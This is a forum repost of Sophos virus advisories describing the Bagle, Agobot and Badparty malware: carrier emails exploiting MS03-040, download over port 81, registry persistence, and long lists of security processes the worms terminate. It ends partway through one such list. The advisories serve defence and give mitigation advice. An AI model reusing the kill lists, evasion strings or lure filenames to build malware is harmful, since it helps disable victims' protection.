| TIP: Click on subject to list as thread! | ANSI |
| echo: | |
|---|---|
| to: | |
| from: | |
| date: | |
| subject: | News |
[cut-n-paste from sophos.com]
W32/Bagle-Q
Aliases
Win32/Bagle.Q
Type
Win32 executable file virus
Detection
Sophos has received several reports of this virus from the wild.
Description
W32/Bagle-Q is a mass-mailing virus that spreads in an unusual manner.
W32/Bagle-Q spreads via a "carrier" email which does not contain the worm
as an attachment.
The email has the following charactersitics:
The Sender address is spoofed.
Subject line: randomly chosen from -
Re: Msg reply
Re: Hello
Re: Yahoo!
Re: Thank you!
Re: Thanks :)
RE: Text message
Re: Document
Incoming message
Re: Incoming Message
Re: Incoming Fax
Hidden message
Fax Message Received
Protected message
RE: Protected message
Forum notify
Request response
Site changes
Re: Hi
Encrypted document
There is no visible message text.
The email addresses are harvested from the hard drive of infected
machines by searching for files with the extensions WAB, TXT, MSG, HTM,
SHTM, STM, XML, DBX, MBX, MDX, EML, NCH, MMF, ODS, CFG, ASP, PHP, WSH,
ADB, TBB, SHT, XLS and OFT.
W32/Bagle-Q avoids email addresses containing the following:
{at}hotmail, {at}msn, {at}microsoft, rating{at}, f-secur, anyone{at}, bugs{at}, contract{at},
feste, gold-certs{at}, help{at}, info{at}, nobody{at}, noone{at}, kasp, admin, icrosoft,
support, ntivi, unix, linux, listserv, certific, sopho, {at}foo, {at}iana,
free-av, {at}messagelab, winzip, google, winrar, samples, abuse, panda,
cafee, spam, {at}avp., noreply, local, root{at}, postmaster{at}
When you open the "carrier" email, the email attempts to exploit a
vulnerability in Outlook. The exploit may cause the email client to
automatically download W32/Bagle-Q from the IP address of a computer
infected with a Bagle variant. The IP address of the computer "server"
serving the Bagle executable is randomly chosen from the list of of 590
IP addresses from the virus data section.
The security vulnerability was reportedly patched by Microsoft in
Microsoft Security Bulletin MS03-040.
The "carrier" email connects to port 81 of the host and opens an HTML
file. The HTML file drops and launches a Visual Basic script q.vbs. This
script connects to the same server and downloads W32/Bagle-Q via an HTTP
(web) request to TCP port 81.
The downloaded copy of W32/Bagle-Q is placed into your system folder
with the name directs.exe or direct.exe (depending on the variant).
W32/Bagle-Q loads on your PC and terminates a wide range of security
applications. The list of applications is:
CLEANER3.EXE
au.exe
d3dupdate.exe
CLEANPC.EXE
AVprotect9x.exe
CMGRDIAN.EXE
CMON016.EXE
CPF9X206.EXE
CPFNT206.EXE
CV.EXE
CWNB181.EXE
CWNTDWMO.EXE
ICSSUPPNT.EXE
DEFWATCH.EXE
DEPUTY.EXE
DPF.EXE
DPFSETUP.EXE
DRWATSON.EXE
ENT.EXE
ESCANH95.EXE
AVXQUAR.EXE
ESCANHNT.EXE
ESCANV95.EXE
AVPUPD.EXE
EXANTIVIRUS-CNET.EXE
FAST.EXE
FIREWALL.EXE
FLOWPROTECTOR.EXE
FP-WIN_TRIAL.EXE
FRW.EXE
FSAV.EXE
AUTODOWN.EXE
FSAV530STBYB.EXE
FSAV530WTBYB.EXE
FSAV95.EXE
GBMENU.EXE
GBPOLL.EXE
GUARD.EXE
GUARDDOG.EXE
HACKTRACERSETUP.EXE
HTLOG.EXE
HWPE.EXE
IAMAPP.EXE
IAMAPP.EXE
IAMSERV.EXE
ICLOAD95.EXE
ICLOADNT.EXE
ICMON.EXE
ICSUPP95.EXE
ICSUPPNT.EXE
IFW2000.EXE
IPARMOR.EXE
IRIS.EXE
JAMMER.EXE
ATUPDATER.EXE
AUPDATE.EXE
KAVLITE40ENG.EXE
KAVPERS40ENG.EXE
KERIO-PF-213-EN-WIN.EXE
KERIO-WRL-421-EN-WIN.EXE
BORG2.EXE
BS120.EXE
CDP.EXE
CFGWIZ.EXE
CFIADMIN.EXE
CFIAUDIT.EXE
AUTOUPDATE.EXE
CFINET.EXE
NAVAPW32.EXE
NAVDX.EXE
NAVSTUB.EXE
NAVW32.EXE
NC2000.EXE
NCINST4.EXE
AUTOTRACE.EXE
NDD32.EXE
NEOMONITOR.EXE
NETARMOR.EXE
NETINFO.EXE
NETMON.EXE
NETSCANPRO.EXE
NETSPYHUNTER-1.2.EXE
NETSTAT.EXE
NISSERV.EXE
NISUM.EXE
NMAIN.EXE
NORTON_INTERNET_SECU_3.0_407.EXE
NPF40_TW_98_NT_ME_2K.EXE
NPFMESSENGER.EXE
NPROTECT.EXE
NSCHED32.EXE
NTVDM.EXE
NVARCH16.EXE
KERIO-WRP-421-EN-WIN.EXE
KILLPROCESSSETUP161.EXE
LDPRO.EXE
LOCALNET.EXE
LOCKDOWN.EXE
LOCKDOWN2000.EXE
LSETUP.EXE
OUTPOST.EXE
CFIAUDIT.EXE
LUCOMSERVER.EXE
AGENTSVR.EXE
ANTI-TROJAN.EXE
ANTI-TROJAN.EXE
ANTIVIRUS.EXE
ANTS.EXE
APIMONITOR.EXE
APLICA32.EXE
APVXDWIN.EXE
ATCON.EXE
ATGUARD.EXE
ATRO55EN.EXE
ATWATCH.EXE
AVCONSOL.EXE
AVGSERV9.EXE
AVSYNMGR.EXE
BD_PROFESSIONAL.EXE
BIDEF.EXE
BIDSERVER.EXE
BIPCP.EXE
BIPCPEVALSETUP.EXE
BISP.EXE
BLACKD.EXE
BLACKICE.EXE
BOOTWARN.EXE
NWINST4.EXE
NWTOOL16.EXE
OSTRONET.EXE
OUTPOSTINSTALL.EXE
OUTPOSTPROINSTALL.EXE
PADMIN.EXE
PANIXK.EXE
PAVPROXY.EXE
DRWEBUPW.EXE
PCC2002S902.EXE
PCC2K_76_1436.EXE
PCCIOMON.EXE
PCDSETUP.EXE
PCFWALLICON.EXE
PCFWALLICON.EXE
PCIP10117_0.EXE
PDSETUP.EXE
PERISCOPE.EXE
PERSFW.EXE
PF2.EXE
AVLTMAIN.EXE
PFWADMIN.EXE
PINGSCAN.EXE
PLATIN.EXE
POPROXY.EXE
POPSCAN.EXE
PORTDETECTIVE.EXE
PPINUPDT.EXE
PPTBC.EXE
PPVSTOP.EXE
PROCEXPLORERV1.0.EXE
PROPORT.EXE
PROTECTX.EXE
PSPF.EXE
WGFE95.EXE
WHOSWATCHINGME.EXE
AVWUPD32.EXE
NUPGRADE.EXE
WHOSWATCHINGME.EXE
WINRECON.EXE
WNT.EXE
WRADMIN.EXE
WRCTRL.EXE
WSBGATE.EXE
WYVERNWORKSFIREWALL.EXE
XPF202EN.EXE
ZAPRO.EXE
ZAPSETUP3001.EXE
ZATUTOR.EXE
CFINET32.EXE
CLEAN.EXE
CLEANER.EXE
CLEANER3.EXE
CLEANPC.EXE
CMGRDIAN.EXE
CMON016.EXE
CPD.EXE
CFGWIZ.EXE
CFIADMIN.EXE
PURGE.EXE
PVIEW95.EXE
QCONSOLE.EXE
QSERVER.EXE
RAV8WIN32ENG.EXE
REGEDT32.EXE
REGEDIT.EXE
UPDATE.EXE
RESCUE.EXE
RESCUE32.EXE
RRGUARD.EXE
RSHELL.EXE
RTVSCN95.EXE
RULAUNCH.EXE
SAFEWEB.EXE
SBSERV.EXE
SD.EXE
SETUP_FLOWPROTECTOR_US.EXE
SETUPVAMEEVAL.EXE
SFC.EXE
SGSSFW32.EXE
SH.EXE
SHELLSPYINSTALL.EXE
SHN.EXE
SMC.EXE
SOFI.EXE
SPF.EXE
SPHINX.EXE
SPYXX.EXE
SS3EDIT.EXE
ST2.EXE
SUPFTRL.EXE
LUALL.EXE
SUPPORTER5.EXE
SYMPROXYSVC.EXE
SYSEDIT.EXE
TASKMON.EXE
TAUMON.EXE
TAUSCAN.EXE
TC.EXE
TCA.EXE
TCM.EXE
TDS2-98.EXE
TDS2-NT.EXE
TDS-3.EXE
TFAK5.EXE
TGBOB.EXE
TITANIN.EXE
TITANINXP.EXE
TRACERT.EXE
TRJSCAN.EXE
TRJSETUP.EXE
TROJANTRAP3.EXE
UNDOBOOT.EXE
VBCMSERV.EXE
VBCONS.EXE
VBUST.EXE
VBWIN9X.EXE
VBWINNTW.EXE
VCSETUP.EXE
VFSETUP.EXE
VIRUSMDPERSONALFIREWALL.EXE
VNLAN300.EXE
VNPC3000.EXE
VPC42.EXE
VPFW30S.EXE
VPTRAY.EXE
VSCENU6.02D30.EXE
VSECOMR.EXE
VSHWIN32.EXE
VSISETUP.EXE
VSMAIN.EXE
VSMON.EXE
VSSTAT.EXE
VSWIN9XE.EXE
VSWINNTSE.EXE
VSWINPERSE.EXE
W32DSM89.EXE
W9X.EXE
WATCHDOG.EXE
WEBSCANX.EXE
CFIAUDIT.EXE
CFINET.EXE
ICSUPP95.EXE
MCUPDATE.EXE
CFINET32.EXE
CLEAN.EXE
CLEANER.EXE
LUINIT.EXE
MCAGENT.EXE
MCUPDATE.EXE
MFW2EN.EXE
MFWENG3.02D30.EXE
MGUI.EXE
MINILOG.EXE
MOOLIVE.EXE
MRFLUX.EXE
MSCONFIG.EXE
MSINFO32.EXE
MSSMMC32.EXE
MU0311AD.EXE
NAV80TRY.EXE
ZAUINST.EXE
ZONALM2601.EXE
ZONEALARM.EXE
A registry entry is added to the following key so that the program
directs.exe loads every time you logon to your computer:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
W32/Bagle-Q makes multiple copies of itself into folders which are
likely to be part of a file-sharing network. The filenames used are:
Microsoft Office 2003 Crack, Working!.exe
Microsoft Windows XP, WinXP Crack, working Keygen.exe
Microsoft Office XP working Crack, Keygen.exe
Porno, sex, oral, anal cool, awesome!!.exe
Porno Screensaver.scr
Serials.txt.exe
Porno pics arhive, xxx.exe
Windows Sourcecode update.doc.exe
Ahead Nero 7.exe
Windown Longhorn Beta Leak.exe
Opera 8 New!.exe
XXX hardcore images.exe
WinAmp 6 New!.exe
WinAmp 5 Pro Keygen Crack Update.exe
Adobe Photoshop 9 full.exe
Matrix 3 Revolution English Subtitles.exe
ACDSee 9.exe
W32/Bagle-Q infects programs on your PC by appending itself to existing
EXE files. The danger of W32/Bagle-Q can be mitigated not only by
updating Sophos Anti-Virus but by blocking connections to TCP port 81
through your network firewall (this port is unlikely to be required for
any real services).
Blocking outbound port 81 connections stops computers on your network
from downloading the worm from outside. Blocking port 81 inbound means
that even if you do get infected you will not pass the virus on to
others.
You should also apply the latest Internet Explorer/Outlook Express
patches from Microsoft. The vulnerability used by W32/Bagle-Q is
described in the Microsoft Security Bulletin MS03-040 and is referred
to as the "Object Tag vulnerability in Popup Window".
W32/Bagle-HTML
Aliases
HTML_BAGLE.Q1
Type
Win32 worm
Detection
Sophos has received several reports of this worm from the wild.
Description
Sophos Anti-Virus detects as W32/Bagle-HTML the email sent by
W32/Bagle-Q and W32/Bagle-R.
The email attempts to launch an exploit, described in Microsoft Security
Bulletin MS03-040, in order to automatically download and run the worm
from a number of compromised computers.
Troj/Badparty-A
Type
Trojan
Detection
At the time of writing, Sophos has received just one report of this
Trojan from the wild.
Description
Troj/Badparty-A displays a message box containing the text 'Press OK to
install the party invitation...'.
When the user clicks on OK the Trojan deletes the partition table in the
master boot sector and the contents of the FAT. The Trojan then attempts
to create a new partition table.
The Trojan creates the following files, which are all copies of
legitimate utilities:
ginst0.dll in the Windows temp folder
int86_16.dll, int86_32.dll, playme.exe and party.ini in the Windows
folder
W32/Agobot-FG
Aliases
Backdoor.Agobot.3.gen
Type
Win32 worm
Detection
At the time of writing, Sophos has received just one report of this worm
from the wild.
Description
W32/Agobot-FG is a network worm which also allows unauthorised remote
access to the computer via IRC channels.
W32/Agobot-FG tries to copy itself to network shares with weak passwords
and attempts to spread to computers using the DCOM RPC and the RPC
locator vulnerabilities.
These vulnerabilities allow the worm to execute its code on target
computers with System level priviledges. For further information on
these vulnerabilities and for details on how to protect/patch the
computer against such attacks please see Microsoft security bulletins
MS03-001 and MS03-026. MS03-026 has been superseded by Microsoft
security bulletin MS03-039.
W32/Agobot-FG copies itself to the Windows system folder as EXPLORED.EXE
and creates entries in the registry at the following locations to run
itself on system restart:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
On NT-based versions of Windows W32/Agobot-FG tries to create a system
service called "mpr" which it sets to run on system startup, creating
registry entries in the following locations:
HKLM\System\CurrentControlSet\Services\MPR
HKLM\System\CurrentControlSet\Enum\Root\LEGACY_MPR
W32/Agobot-FG attempts to terminate the following virus, anti-virus and
security-related processes.
tftpd.exe
dllhost.exe
winppr32.exe
mspatch.exe
penis32.exe
msblast.exe
zonealarm.EXE
zapro.EXE
vsmon.EXE
vshwin32.EXE
vbcmserv.EXE
sbserv.EXE
rtvscan.EXE
rapapp.EXE
pcscan.EXE
pccwin97.EXE
pccntmon.EXE
pavproxy.EXE
nvsvc32.EXE
ntrtscan.EXE
npscheck.EXE
notstart.EXE
lockdown2000.EXE
iamserv.EXE
iamapp.EXE
gbpoll.EXE
gbmenu.EXE
fsmb32.EXE
fsma32.EXE
fsm32.EXE
fsgk32.EXE
fsav32.EXE
fsaa.EXE
fnrb32.EXE
fih32.EXE
fch32.EXE
fameh32.EXE
f-stopw.EXE
defscangui.EXE
defalert.EXE
cpd.EXE
cleaner3.EXE
cleaner.EXE
ccPxySvc.EXE
ccEvtMgr.EXE
ccApp.EXE
blackd.EXE
avpm.EXE
avkwctl9.EXE
avkservice.EXE
avkpop.EXE
apvxdwin.EXE
agentw.EXE
_AVPM.EXE
_AVPCC.EXE
_AVP32.EXE
ZONEALARM.EXE
ZONALM2601.EXE
ZAUINST.EXE
ZATUTOR.EXE
ZAPSETUP3001.EXE
ZAPRO.EXE
XPF202EN.EXE
WrCtrl.EXE
WrAdmin.EXE
WYVERNWORKSFIREWALL.EXE
WSBGATE.EXE
WRCTRL.EXE
WRADMIN.EXE
WNT.EXE
WINRECON.EXE
WIMMUN32.EXE
WHOSWATCHINGME.EXE
WGFE95.EXE
WFINDV32.EXE
WEBTRAP.EXE
WEBSCANX.EXE
WATCHDOG.EXE
W9X.EXE
W32DSM89.EXE
VetTray.EXE
Vet95.EXE
VbCons.EXE
VSWINPERSE.EXE
VSWINNTSE.EXE
VSWIN9XE.EXE
VSSTAT.EXE
VSMON.EXE
VSMAIN.EXE
VSISETUP.EXE
VSECOMR.EXE
VSCHED.EXE
VSCENU6.02D30.EXE
VSCAN40.EXE
VPTRAY.EXE
VPFW30S.EXE
VPC42.EXE
VPC32.EXE
VNPC3000.EXE
VNLAN300.EXE
VIRUSMDPERSONALFIREWALL.EXE
VIR-HELP.EXE
VFSETUP.EXE
VETTRAY.EXE
VET95.EXE
VET32.EXE
VCSETUP.EXE
VBWINNTW.EXE
VBWIN9X.EXE
VBUST.EXE
VBCONS.EXE
VBCMSERV.EXE
UPDATE.EXE
UNDOBOOT.EXE
TROJANTRAP3.EXE
TRJSETUP.EXE
TRJSCAN.EXE
TRACERT.EXE
TITANINXP.EXE
TITANIN.EXE
TGBOB.EXE
TFAK5.EXE
TFAK.EXE
TDS2-NT.EXE
TDS2-98.EXE
TDS-3.EXE
TCM.EXE
TCA.EXE
TC.EXE
TBSCAN.EXE
TAUMON.EXE
TASKMON.EXE
SymProxySvc.EXE
SweepNet.SWEEPSRV.SYS.SWNETSUP.EXE
Sphinx.EXE
SYSEDIT.EXE
SYMTRAY.EXE
SYMPROXYSVC.EXE
SWEEP95.EXE
SUPPORTER5.EXE
SUPFTRL.EXE
ST2.EXE
SS3EDIT.EXE
SPYXX.EXE
SPHINX.EXE
SPF.EXE
SOFI.EXE
SMC.EXE
SHN.EXE
SHELLSPYINSTALL.EXE
SH.EXE
SGSSFW32.EXE
SFC.EXE
SETUP_FLOWPROTECTOR_US.EXE
SETUPVAMEEVAL.EXE
SERV95.EXE
SD.EXE
SCRSCAN.EXE
SCANPM.EXE
SCAN95.EXE
SCAN32.EXE
SBSERV.EXE
SAFEWEB.EXE
RULAUNCH.EXE
RTVSCN95.EXE
RSHELL.EXE
RRGUARD.EXE
RESCUE32.EXE
RESCUE.EXE
REGEDT32.EXE
REGEDIT.EXE
REALMON.EXE
RAV8WIN32ENG.EXE
RAV7WIN.EXE
RAV7.EXE
QSERVER.EXE
QCONSOLE.EXE
PVIEW95.EXE
PURGE.EXE
PSPF.EXE
PROTECTX.EXE
PROPORT.EXE
PROGRAMAUDITOR.EXE
PROCEXPLORERV1.0.EXE
PROCESSMONITOR.EXE
PPVSTOP.EXE
PPTBC.EXE
PPINUPDT.EXE
PORTMONITOR.EXE
PORTDETECTIVE.EXE
POPSCAN.EXE
POPROXY.EXE
POP3TRAP.EXE
PLATIN.EXE
PINGSCAN.EXE
PFWADMIN.EXE
PF2.EXE
PERSWF.EXE
PERSFW.EXE
PERISCOPE.EXE
PDSETUP.EXE
PCIP10117_0.EXE
PCFWALLICON.EXE
PCDSETUP.EXE
PCCWIN98.EXE
PCCIOMON.EXE
PCC2K_76_1436.EXE
PCC2002S902.EXE
PAVW.EXE
PAVSCHED.EXE
PAVPROXY.EXE
PAVCL.EXE
PANIXK.EXE
PADMIN.EXE
OUTPOSTPROINSTALL.EXE
OUTPOSTINSTALL.EXE
OUTPOST.EXE
OSTRONET.EXE
Nupgrade.EXE
Nui.EXE
NeoWatchLog.EXE
Navw32.EXE
NWTOOL16.EXE
NWService.EXE
NWINST4.EXE
NVC95.EXE
NVARCH16.EXE
NTXconfig.EXE
NTVDM.EXE
NSCHED32.EXE
NPSSVC.EXE
NPROTECT.EXE
NPFMESSENGER.EXE
NPF40_TW_98_NT_ME_2K.EXE
NORTON_INTERNET_SECU_3.0_407.EXE
NORMIST.EXE
NOD32.EXE
NMAIN.EXE
NISUM.EXE
NISSERV.EXE
NETUTILS.EXE
NETSTAT.EXE
NETSPYHUNTER-1.2.EXE
NETSCANPRO.EXE
NETMON.EXE
NETINFO.EXE
NETARMOR.EXE
NEOMONITOR.EXE
NDD32.EXE
NCINST4.EXE
NC2000.EXE
NAVWNT.EXE
NAVW32.EXE
NAVSTUB.EXE
NAVNT.EXE
NAVLU32.EXE
NAVENGNAVEX15.NAVLU32.EXE
NAVDX.EXE
NAVAPW32.EXE
NAVAPSVC.EXE
NAVAP.navapsvc.EXE
NAV Auto-Protect.NAV80TRY.EXE
N32SCANW.EXE
Monitor.EXE
Mcshield.EXE
MWATCH.EXE
MU0311AD.EXE
MSSMMC32.EXE
MSINFO32.EXE
MSCONFIG.EXE
MRFLUX.EXE
MPFTRAY.EXE
MPFSERVICE.EXE
MPFAGENT.EXE
MOOLIVE.EXE
MONITOR.EXE
MINILOG.EXE
MGUI.EXE
MGHTML.EXE
MGAVRTE.EXE
MGAVRTCL.EXE
MFWENG3.02D30.EXE
MFW2EN.EXE
MCVSSHLD.EXE
MCVSRTE.EXE
MCUPDATE.EXE
MCTOOL.EXE
MCMNHDLR.EXE
MCAGENT.EXE
LUSPT.EXE
LUINIT.EXE
LUCOMSERVER.EXE
LUAU.EXE
LUALL.EXE
LSETUP.EXE
LOOKOUT.EXE
LOCKDOWN2000.EXE
LOCKDOWN.EXE
LOCALNET.EXE
LDSCAN.EXE
LDPROMENU.EXE
LDPRO.EXE
LDNETMON.EXE
KILLPROCESSSETUP161.EXE
KERIO-WRP-421-EN-WIN.EXE
KERIO-WRL-421-EN-WIN.EXE
KERIO-PF-213-EN-WIN.EXE
KAVPF.EXE
KAVPERS40ENG.EXE
KAVLITE40ENG.EXE
JEDI.EXE
JAMMER.EXE
ISRV95.EXE
IRIS.EXE
IPARMOR.EXE
IOMON98.EXE
IFW2000.EXE
IFACE.EXE
ICSUPPNT.EXE
ICSUPP95.EXE
ICMON.EXE
ICLOADNT.EXE
ICLOAD95.EXE
IBMAVSP.EXE
IBMASN.EXE
IAMSTATS.EXE
IAMSERV.EXE
IAMAPP.EXE
HWPE.EXE
HTLOG.EXE
HACKTRACERSETUP.EXE
GUARDDOG.EXE
GUARD.EXE
GENERICS.EXE
GBPOLL.EXE
GBMENU.EXE
FSAV95.EXE
FSAV530WTBYB.EXE
FSAV530STBYB.EXE
FSAV.EXE
FRW.EXE
FPROT.EXE
FP-WIN_TRIAL.EXE
FP-WIN.EXE
FLOWPROTECTOR.EXE
FIREWALL.EXE
FINDVIRU.EXE
FAST.EXE
F-STOPW.EXE
F-PROT95.EXE
F-PROT.EXE
F-AGNT95.EXE
EXPERT.EXE
EXE.AVXW.EXE
EXANTIVIRUS-CNET.EXE
EVPN.EXE
ETRUSTCIPE.EXE
ESPWATCH.EXE
ESCANV95.EXE
ESCANHNT.EXE
ESCANH95.EXE
ESAFE.EXE
ENT.EXE
EFPEADM.EXE
ECENGINE.EXE
DVP95_0.EXE
DVP95.EXE
DRWEB32.EXE
DRWATSON.EXE
DPFSETUP.EXE
DPF.EXE
DOORS.EXE
DEPUTY.EXE
DEFWATCH.EXE
Claw95cf.EXE
Claw95.EXE
CWNTDWMO.EXE
CWNB181.EXE
CV.EXE
CTRL.EXE
CPFNT206.EXE
CPF9X206.EXE
CPD.EXE
CONNECTIONMONITOR.EXE
CMON016.EXE
CMGRDIAN.EXE
CLEANPC.EXE
CLEANER3.EXE
CLEANER.EXE
CLEAN.EXE
CLAW95CF.EXE
CFINET32.EXE
CFINET.EXE
CFIAUDIT.EXE
CFIADMIN.EXE
CFGWIZ.EXE
CDP.EXE
BlackICE.EXE
BS120.EXE
BORG2.EXE
BOOTWARN.EXE
BLACKICE.EXE
BLACKD.EXE
BISP.EXE
BIPCPEVALSETUP.EXE
BIPCP.EXE
BIDSERVER.EXE
BIDEF.EXE
BD_PROFESSIONAL.EXE
Avsched32.EXE
AvkServ.EXE
Avgctrl.EXE
AvgServ.EXE
AvSynMgr.AVSYNMGR.EXE
AutoTrace.EXE
AckWin32.EXE
AVXQUAR.EXE
AVXMONITORNT.EXE
AVXMONITOR9X.EXE
AVWUPSRV.EXE
AVWUPD32.EXE
AVWINNT.EXE
AVWIN95.EXE
AVPUPD.EXE
AVPTC32.EXE
AVPM.EXE
AVPDOS32.EXE
AVPCC.EXE
AVP32.EXE
AVP.EXE
AVNT.EXE
AVGW.EXE
AVGUARD.EXE
AVGSERV9.EXE
AVGSERV.EXE
AVGNT.EXE
AVGCTRL.EXE
AVGCC32.EXE
AVE32.EXE
AVCONSOL.EXE
AUTOUPDATE.EXE
AUTODOWN.EXE
AUPDATE.EXE
ATWATCH.EXE
ATUPDATER.EXE
ATRO55EN.EXE
ATGUARD.EXE
ATCON.EXE
APVXDWIN.EXE
APLICA32.EXE
APIMONITOR.EXE
ANTS.EXE
ANTIVIRUS.EXE
ANTI-TROJAN.EXE
AMON9X.EXE
ALOGSERV.EXE
ALERTSVC.EXE
AGENTSVR.EXE
ADVXDWIN.EXE
ACKWIN32.EXE
W32/Bagle-R
Aliases
Win32/Bagle.R, W32/Bagle.R.worm, W32/Bagle.S, I-Worm.Bagle.p,
W32/Bagle.T, W32.Beagle.R{at}mm, W32.Beagle.S{at}mm, W32.Beagle.T{at}mm
Type
Win32 executable file virus
Detection
Sophos has received several reports of this virus from the wild.
Description
Please note: Sophos Anti-Virus also detects the W32/Bagle-S and
W32/Bagle-T worms as W32/Bagle-R.
W32/Bagle-R is a mass-mailing virus that spreads in an unusual manner.
W32/Bagle-R spreads via a "carrier" email which does not contain the
worm as an attachment.
The email has the following charactersitics:
The Sender address is spoofed.
Subject line: randomly chosen from -
Re: Msg reply
Re: Hello
Re: Yahoo!
Re: Thank you!
Re: Thanks :)
RE: Text message
Re: Document
Incoming message
Re: Incoming Message
Re: Incoming Fax
Hidden message
Fax Message Received
Protected message
RE: Protected message
Forum notify
Request response
Site changes
Re: Hi
Encrypted document
There is no visible message text.
The email addresses are harvested from the hard drive of infected
machines by searching for files with the extensions WAB, TXT, MSG, HTM,
SHTM, STM, XML, DBX, MBX, MDX, EML, NCH, MMF, ODS, CFG, ASP, PHP, WSH,
ADB, TBB, SHT, XLS and OFT.
W32/Bagle-R avoids email addresses containing the following:
{at}hotmail, {at}msn, {at}microsoft, rating{at}, f-secur, anyone{at}, bugs{at}, contract{at},
feste, gold-certs{at}, help{at}, info{at}, nobody{at}, noone{at}, kasp, admin, icrosoft,
support, ntivi, unix, linux, listserv, certific, sopho, {at}foo, {at}iana,
free-av, {at}messagelab, winzip, google, winrar, samples, abuse, panda,
cafee, spam, {at}avp., noreply, local, root{at}, postmaster{at}
When you open the "carrier" email, the email attempts to exploit a
vulnerability in Outlook. The exploit may cause the email client to
automatically download W32/Bagle-R from the IP address of a computer
infected with a Bagle variant. The IP address of the computer "server"
serving the Bagle executable is randomly chosen from the list of of 590
IP addresses from the virus data section.
The security vulnerability was reportedly patched by Microsoft in
Microsoft Security Bulletin MS03-040.
The "carrier" email connects to port 81 of the host and opens an HTML
file. The HTML file drops and launches a Visual Basic script q.vbs. This
script connects to the same server and downloads W32/Bagle-R via an HTTP
(web) request to TCP port 81.
The downloaded copy of W32/Bagle-R is placed into your system folder
with the name directs.exe or direct.exe (depending on the variant).
W32/Bagle-R loads on your PC and terminates a wide range of security
applications. The list of applications is:
CLEANER3.EXE
au.exe
d3dupdate.exe
CLEANPC.EXE
AVprotect9x.exe
CMGRDIAN.EXE
CMON016.EXE
CPF9X206.EXE
CPFNT206.EXE
CV.EXE
CWNB181.EXE
CWNTDWMO.EXE
ICSSUPPNT.EXE
DEFWATCH.EXE
DEPUTY.EXE
DPF.EXE
DPFSETUP.EXE
DRWATSON.EXE
ENT.EXE
ESCANH95.EXE
AVXQUAR.EXE
ESCANHNT.EXE
ESCANV95.EXE
AVPUPD.EXE
EXANTIVIRUS-CNET.EXE
FAST.EXE
FIREWALL.EXE
FLOWPROTECTOR.EXE
FP-WIN_TRIAL.EXE
FRW.EXE
FSAV.EXE
AUTODOWN.EXE
FSAV530STBYB.EXE
FSAV530WTBYB.EXE
FSAV95.EXE
GBMENU.EXE
GBPOLL.EXE
GUARD.EXE
GUARDDOG.EXE
HACKTRACERSETUP.EXE
HTLOG.EXE
HWPE.EXE
IAMAPP.EXE
IAMAPP.EXE
IAMSERV.EXE
ICLOAD95.EXE
ICLOADNT.EXE
ICMON.EXE
ICSUPP95.EXE
ICSUPPNT.EXE
IFW2000.EXE
IPARMOR.EXE
IRIS.EXE
JAMMER.EXE
ATUPDATER.EXE
AUPDATE.EXE
KAVLITE40ENG.EXE
KAVPERS40ENG.EXE
KERIO-PF-213-EN-WIN.EXE
KERIO-WRL-421-EN-WIN.EXE
BORG2.EXE
BS120.EXE
CDP.EXE
CFGWIZ.EXE
CFIADMIN.EXE
CFIAUDIT.EXE
AUTOUPDATE.EXE
CFINET.EXE
NAVAPW32.EXE
NAVDX.EXE
NAVSTUB.EXE
NAVW32.EXE
NC2000.EXE
NCINST4.EXE
AUTOTRACE.EXE
NDD32.EXE
NEOMONITOR.EXE
NETARMOR.EXE
NETINFO.EXE
NETMON.EXE
NETSCANPRO.EXE
NETSPYHUNTER-1.2.EXE
NETSTAT.EXE
NISSERV.EXE
NISUM.EXE
NMAIN.EXE
NORTON_INTERNET_SECU_3.0_407.EXE
NPF40_TW_98_NT_ME_2K.EXE
NPFMESSENGER.EXE
NPROTECT.EXE
NSCHED32.EXE
NTVDM.EXE
NVARCH16.EXE
KERIO-WRP-421-EN-WIN.EXE
KILLPROCESSSETUP161.EXE
LDPRO.EXE
LOCALNET.EXE
LOCKDOWN.EXE
LOCKDOWN2000.EXE
LSETUP.EXE
OUTPOST.EXE
CFIAUDIT.EXE
LUCOMSERVER.EXE
AGENTSVR.EXE
ANTI-TROJAN.EXE
ANTI-TROJAN.EXE
ANTIVIRUS.EXE
ANTS.EXE
APIMONITOR.EXE
APLICA32.EXE
APVXDWIN.EXE
ATCON.EXE
ATGUARD.EXE
ATRO55EN.EXE
ATWATCH.EXE
AVCONSOL.EXE
AVGSERV9.EXE
AVSYNMGR.EXE
BD_PROFESSIONAL.EXE
BIDEF.EXE
BIDSERVER.EXE
BIPCP.EXE
BIPCPEVALSETUP.EXE
BISP.EXE
BLACKD.EXE
BLACKICE.EXE
BOOTWARN.EXE
NWINST4.EXE
NWTOOL16.EXE
OSTRONET.EXE
OUTPOSTINSTALL.EXE
OUTPOSTPROINSTALL.EXE
PADMIN.EXE
PANIXK.EXE
PAVPROXY.EXE
DRWEBUPW.EXE
PCC2002S902.EXE
PCC2K_76_1436.EXE
PCCIOMON.EXE
PCDSETUP.EXE
PCFWALLICON.EXE
PCFWALLICON.EXE
PCIP10117_0.EXE
PDSETUP.EXE
PERISCOPE.EXE
PERSFW.EXE
PF2.EXE
AVLTMAIN.EXE
PFWADMIN.EXE
PINGSCAN.EXE
PLATIN.EXE
POPROXY.EXE
POPSCAN.EXE
PORTDETECTIVE.EXE
PPINUPDT.EXE
PPTBC.EXE
PPVSTOP.EXE
PROCEXPLORERV1.0.EXE
PROPORT.EXE
PROTECTX.EXE
PSPF.EXE
WGFE95.EXE
WHOSWATCHINGME.EXE
AVWUPD32.EXE
NUPGRADE.EXE
WHOSWATCHINGME.EXE
WINRECON.EXE
WNT.EXE
WRADMIN.EXE
WRCTRL.EXE
WSBGATE.EXE
WYVERNWORKSFIREWALL.EXE
XPF202EN.EXE
ZAPRO.EXE
ZAPSETUP3001.EXE
ZATUTOR.EXE
CFINET32.EXE
CLEAN.EXE
CLEANER.EXE
CLEANER3.EXE
CLEANPC.EXE
CMGRDIAN.EXE
CMON016.EXE
CPD.EXE
CFGWIZ.EXE
CFIADMIN.EXE
PURGE.EXE
PVIEW95.EXE
QCONSOLE.EXE
QSERVER.EXE
RAV8WIN32ENG.EXE
REGEDT32.EXE
REGEDIT.EXE
UPDATE.EXE
RESCUE.EXE
RESCUE32.EXE
RRGUARD.EXE
RSHELL.EXE
RTVSCN95.EXE
RULAUNCH.EXE
SAFEWEB.EXE
SBSERV.EXE
SD.EXE
SETUP_FLOWPROTECTOR_US.EXE
SETUPVAMEEVAL.EXE
SFC.EXE
SGSSFW32.EXE
SH.EXE
SHELLSPYINSTALL.EXE
SHN.EXE
SMC.EXE
SOFI.EXE
